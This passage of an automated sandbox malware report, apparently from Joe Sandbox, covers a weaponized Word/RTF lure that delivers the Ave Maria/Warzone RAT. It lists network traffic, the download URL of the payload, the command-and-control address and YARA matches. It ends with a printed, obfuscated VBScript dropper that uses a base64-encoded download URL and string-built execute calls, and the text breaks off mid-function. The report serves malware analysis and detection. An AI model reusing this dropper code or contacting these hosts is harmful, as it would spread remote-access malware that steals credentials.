          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficDNS query: name: login.929389.ankura.us
          Source: global trafficDNS query: name: login.929389.ankura.us
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 159.223.2.212:80

          Networking

          barindex
          Source: TrafficSnort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 20.126.95.155:7800 -> 192.168.2.22:49173
          Source: TrafficSnort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 20.126.95.155:7800 -> 192.168.2.22:49173
          Source: TrafficSnort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49173 -> 20.126.95.155:7800
          Source: TrafficSnort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49173 -> 20.126.95.155:7800
          Source: TrafficSnort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 20.126.95.155:7800 -> 192.168.2.22:49173
          Source: TrafficSnort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49173 -> 20.126.95.155:7800
          Source: Malware configuration extractorURLs: 20.126.95.155
          Source: global trafficHTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
          Source: Joe Sandbox ViewASN Name: CELANESE-US CELANESE-US
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 20.126.95.155:7800
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929
          Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929389.ank
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929389.ankura.us/Aw
          Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exe
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exePE
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://login.929389.ankura.us
          Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.926952704.000000001B39C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://login.929389.ankura.us/AwOgYiWG/explorer.exe
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: login.929389.ankura.us
          Source: global trafficHTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: unknownTCP traffic detected without corresponding DNS query: 20.126.95.155
          Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputData

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLEMatched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
          Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
          Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drStream path '_1725425945/\x1Ole10Native' : :....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT..... ...C:\9jkepaD\DZdtfhgYgeghD{.scT.s....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. 